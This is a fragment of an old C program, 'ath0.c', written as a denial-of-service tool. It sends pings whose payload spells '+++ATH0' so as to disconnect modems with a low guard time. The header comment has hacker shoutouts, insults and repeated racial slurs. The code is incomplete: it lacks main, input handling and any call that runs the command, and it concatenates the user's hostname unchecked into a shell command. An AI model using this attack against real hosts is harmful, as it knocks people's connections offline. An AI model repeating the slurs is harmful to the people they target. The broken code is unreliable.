/* Name: ath0.c v1.0
Author: Cyber_Bob
Made: Pico 3.4 (very l33t scr1pt maker y0 ;)
Compiled: linux 2.2.10 i586 (red hat 5.2)
gcc version
gcc ath0.c -o ath0
This script uses the linux ping command to simulate the +++ATH0
bug represented in modems that have thier gaurd time set low.
Consider this a version of gin.c that actually works... but it
is also more efficient in a way because of the emplementation of
"ping". Though a downside to this script is it can only be used
with systems who's ping command supports the -p flag.... Which is
just about all of them except windows lamers... i mean Leet windows
j3wz3rs. Notice the l33t windows j3wz3r writing..
[Shoutz] go to the #NEUA and #NukeZ crew on Undernet..
[Shoutz/People] go to Bro.. for being the leet test subject...
DePhAzEr for being my nigga ;)
Sleep for having a loose girl friend :P
and myself for.... something....
[Fuck you's] go to #ViRii on Undernet...
(don't make me get #neua on yer ass again.)
I own you R2-D2... lame nigger bitch. :P
char command[145] = "/bin/ping -c 5 -p 2b2b2b415448300d ";
char host[100]; puts("\n\n\t\tATH0.C - Cyber_Bob");
puts("\t\t v1.0 \n\n");
printf("\nEnter Hostname: ");
strcat(command, host);
puts("\n\n\nNow sending 5 ICMP's containing the +++ATH0 string to...");
printf("%s\n", host);
puts("\n\n\n\nDone sending. If packet loss = 100% ");
puts("The target is dead, unless firewalled.\n");
return 0;